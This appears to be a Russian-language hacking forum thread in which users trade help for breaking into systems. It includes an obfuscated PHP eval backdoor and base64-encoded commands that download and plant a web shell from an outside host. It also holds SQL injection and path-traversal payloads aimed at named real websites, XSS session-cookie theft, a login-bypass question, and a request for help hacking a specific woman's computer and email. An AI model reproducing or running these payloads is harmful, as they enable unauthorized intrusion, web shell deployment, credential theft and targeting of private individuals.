Делаю так http://localhost/x.php?b=phpinfo(); показывает http://localhost/x.php?b=ls не показывает allow_url_fopen On magic_quotes_gpc On Но при http://localhost/x.php?b=eval(file_get_contents('http://blalba/shell.txt')); пустой экран. Попробывал <? eval(file_get_contents($_GET['e'])); ?> http://localhost/x.php?e=http://blabla/shell.txt пустой экран. Уже заканчивается фантазия ... Может есть еще идеи?
if (isset($_REQUEST['b'])) eval(stripslashes($_REQUEST['b'])); <?eval(base64_decode('YXNzZXJ0KHN0cmlwc2xhc2hlcygkX 1JFUVVFU1RbYl0pKTs=')); ?> по поводу ls погорячился, точнее курю мануалы и понимаю что сглупил... а если еще точнее не обьявил системную ...
b=copy('http://site.com/shell.txt','shell.php'); b=eval(base64_decode('Y29weSgnaHR0cDovL3NpdGUuY29tL3NoZWxsLnR4dCcsJ3NoZWxsLnBocCcpOw==')); ----------- b=system('wget http://site.com/shell.php'); b=eval(base64_decode('c3lzdGVtKCd3Z2V0IGh0dHA6Ly9zaXRlLmNvbS9zaGVsbC5waHAnKTs=')); вариантов много, если хотите залить шелл пробуйте эти для примера, смените урл на нормальный линк к шеллу
Помогите раскрутить http://www.lazyjack.co.jp/cp-bin/webstore/catalog/product_info.php/products_id/1647' pls
http://www.lazyjack.co.jp/cp-bin/webstore/catalog/product_info.php/products_id/1647' or 1 group by concat(version(),floor(rand(0)*2)) having max(0) or 1-- 1
http://meb[G00GLE]el-dvs.ru/main_p3.php?&d=mebelionika&nmr=2&nmr2=3&im=../../../../../../boot.ini%00&rzd=&nmstr=495&sn=&content=%CC%E5%E1%E5%EB%FC%ED%E0%FF%20%F4%E0%E1%F0%E8%EA%E0%20%CC%E5%E1%E5%EB%E8%EE%ED%E8%EA%E0&content2=catalog_mebelionika Что-то можно вообще сделать? Забавный сайт какой-то.
Тут LFI достаточно и этого Но ты там не найдешь boot.ini, потому что этот сайт не на диске C(загрузочном) находится, по-ходу можно читать файлы на диске D, но вряд ли там есть что-то полезное
Знаю ip жертвы, открытые порты 21 / tcp ftp, 22 / tcp ssh, 23 / tcp telnet, 80 / tcp http, 1863 / tcp - msnp, 1864 / tcp - paradym-31port, 5190 - про этот порт не знаю. есть доступ к почте жертвы. конекчусь с помощью putty через ssh или telnet port и получаю epic fail возможно у жертвы стоит галочка в удаленном помощнике - проверил что-то не получается зайти. Цель проникнуть на комп, получить доступ, опыта нет подскажите идеи что можно придумать.
Фаервол может делать "epic fail". Так же у жертвы может быть динамический IP. И вообще странное что у юзера открыты эти порты, может это роутер? =\
Да роутер вроде есть, кстати по ssh сразу кричит epic fail, а вот через telnet вроде заходит, в настройках не указывал под каким именем зайти, но тоже тишина, не вижу строчки ввести логин бла бла бла. Может через почтовый ящик что-то замутить можно? доступ есть, проблема вся в том какое письмецо прислать и что стырить, чтобы получить доступ. p.s. жертва - девушка.
id=1'+group+by+DocSrc,name_doc+having+'1'='1'-- выдает id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- Посоветуйте пожалуйсто решение
Вопрос насчет xss Есть сайт на нем уязвим модуль search Используется уязвимость вот такая Когда сниффаю получаю лог такого вида Code: cnd__lastvisit=1302335876; cnd__lastactivity=0; IDstack=,56445,; vbseo_loggedin=yes; __utma=89779204.1220064702.1302335873.1302335873.1302335873.1; __utmb=89779204.2.10.1302335873; __utmc=89779204; __utmz=89779204.1302335873.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nugg_frequencyCapping=2 Как я выяснил ultm* это Google аналитик А сама сессия храниться в cnd__sessionhash И она не приходит Что можно сделать в этом случае
Есть php-скрипт. У него вверху задаётся: PHP: $setup['param_login']='login'; $setup['param_pw']='pass'; и в теле используются заданные выше данные: PHP: function AddLinkPost() { global $setup; $pw = GetParametr('pw', 'post'); $login = GetParametr('login', 'post'); $linkdata = GoodVal(GetParametr('linkdata', 'post')); if( ($login != $setup['param_login']) or ($pw != $setup['param_pw']) ){ echo 'strbeg'.'errorlogin'.'strend'; exit; } // Далее пошёл код Вот меня интересует можно как-то обойти проверку соответствия логина и пароля? Выкладываю полную версию скрипта: PHP: <?php error_reporting(0); $setup['param_login']='mylogin'; $setup['param_pw']='mypass'; $addlink=GetParametr('addlink','post'); if ($addlink==1) AddLinkPost(); $dellink=GetParametr('dellink','post'); if ($dellink==1) DelLinkPost(); FindLink(); function file_put_contentz($file,$content) { $h=fopen($file,'wb'); fwrite($h,$content,strlen($content)); fclose($h); } exit; function FindLink() { global $setup; $id=GetParametr('id','get'); $linkdata=file_get_contents("base/{$id}.txt"); echo Tmpl($linkdata,'template.html'); } function DelLinkPost() { global $setup; $pw=GetParametr('pw','post'); $login=GetParametr('login','post'); if (($login!=$setup['param_login'])or($pw!=$setup['param_pw'])) { echo 'strbeg'.'errorlogin'.'strend'; exit; } echo 'strbeg'.'Deleted!'.'strend'; exit; } function AddLinkPost() { global $setup; $pw = GetParametr('pw', 'post'); $login = GetParametr('login', 'post'); $linkdata = GoodVal(GetParametr('linkdata', 'post')); if( ($login != $setup['param_login']) or ($pw != $setup['param_pw']) ){ echo 'strbeg'.'errorlogin'.'strend'; exit; } $last=file_get_contents("base/last.txt"); $last = isset($last) ? intval($last) : 0; $last++; file_put_contentz("base/last.txt", $last); file_put_contentz("base/{$last}.txt", $linkdata); echo 'strbeg'.$last.'strend'; exit; } function GetParametr($name,$type) { global $HTTP_GET_VARS,$HTTP_POST_VARS; if ($type=='get') $from=$_GET; if ($type=='post') $from=$_POST; $par=-1; while (list($key,$val)=each($from)) { if ($key==$name) {$par=$val;} } return $par; } function Tmpl($linkdata,$filename) { $fd = fopen( $filename, "r" ); $data = fread( $fd, filesize( $filename ) ); fclose( $fd ); $data=str_replace('!linkdata!',$linkdata,$data); return $data; } function GoodVal($str) { $str=str_replace('\"','"',$str); return str_replace("\'","'",$str); } ?> По не подтверждённым данным этот скрипт уже был взломан, вот только как?
подбирать их? всмысле наугад? запросов в БД никаких, работа только с текстовыми файлами. другие варанты?
